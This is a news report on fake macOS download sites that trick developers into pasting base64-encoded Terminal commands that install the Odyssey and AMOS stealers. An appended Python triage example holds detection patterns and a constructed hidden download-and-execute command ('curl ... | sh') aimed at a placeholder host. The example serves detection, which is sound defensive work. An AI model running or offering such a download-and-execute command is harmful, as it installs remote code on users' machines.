
"The campaign spreads the Odyssey Stealer and AMOS (Atomic macOS Stealer) malware families. Both families focus on stealing system information, browser data, and crypto wallet login details. The attacks are carefully designed to exploit developers' trust. The fake Homebrew and TradingView sites display seemingly legitimate download portals with buttons such as Copy command. When a user clicks the button, a hidden, base64-encoded Terminal command is copied to the clipboard."
"In some cases, the command was presented as a so-called security verification process, for example via a fake Cloudflare check. Technical analysis shows that immediately after installation, the malware attempts to obtain administrator privileges via sudo, collects system information, and terminates processes such as OneDrive updates to hinder detection or recovery. Sensitive data such as browser cookies, Keychain information, and crypto wallets are then exfiltrated to the command-and-control server."
Over 85 domains host fake macOS download sites impersonating Homebrew, LogMeIn, and TradingView. Social engineering prompts developers to click 'Copy' buttons that place base64-encoded Terminal commands into the clipboard. Once pasted and run, those commands download a shell script that bypasses macOS protections and installs Odyssey Stealer or AMOS. After installation, the malware requests sudo, collects system information, and terminates processes such as OneDrive updates to hinder detection. It then exfiltrates browser cookies, Keychain entries, and crypto wallet credentials to command-and-control servers. Paid search ads drive traffic to the malicious domains; servers and SSL certificates are reused and registered to individuals, indicating a semi-professional, long-term operation.
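As an added example (not code from the article or from the reported campaign), a small Python triage function that decodes `echo <base64> | base64 -d` pipelines found in shell history or command-line telemetry and flags the download-and-execute, sudo and process-kill behaviours the article describes. The pattern list and the sample command are constructed assumptions for illustration; the host name is a placeholder, not an indicator from the campaign.

```python
import base64
import binascii
import re

# Behaviours to flag, taken from what the article describes (download of a
# shell script, sudo request, killing processes). The patterns are an
# assumption for illustration, not the campaign's exact command line.
SUSPICIOUS = [
    (r"\b(curl|wget)\b.*\|\s*(ba|z)?sh\b", "download piped to shell"),
    (r"\bsudo\b", "requests sudo"),
    (r"\b(pkill|killall)\b", "terminates processes"),
]

# `echo <base64> | base64 -d` (GNU) or `base64 -D` (macOS) pipelines.
B64_PIPE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(-d|-D|--decode)\b"
)


def decode_embedded_base64(command: str) -> list:
    """Return the decoded text of every base64 pipeline found in `command`."""
    decoded = []
    for match in B64_PIPE.finditer(command):
        try:
            raw = base64.b64decode(match.group(1), validate=True)
        except (binascii.Error, ValueError):
            continue  # not valid base64; the raw-text checks still apply
        decoded.append(raw.decode("utf-8", "replace"))
    return decoded


def analyse_command(command: str) -> list:
    """Return (origin, reason) findings; origin is "raw" for the command as
    typed and "decoded" for text only visible after base64-decoding."""
    findings = []
    texts = [("raw", command)]
    texts += [("decoded", text) for text in decode_embedded_base64(command)]
    for origin, text in texts:
        for pattern, reason in SUSPICIOUS:
            if re.search(pattern, text):
                findings.append((origin, reason))
    return findings


# Constructed sample: a hidden payload the way a fake "Copy command" button
# would hand it over. The host is a placeholder, not a real indicator.
HIDDEN_PAYLOAD = "curl -fsSL https://example.invalid/install.sh | sh"
SAMPLE_COMMAND = 'echo "%s" | base64 -D | sh' % base64.b64encode(
    HIDDEN_PAYLOAD.encode()).decode()
```

Note that the raw command line alone shows nothing suspicious; the finding only appears after decoding, which is why base64 pipelines deserve a decode step in detection logic.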
Read at Techzine Global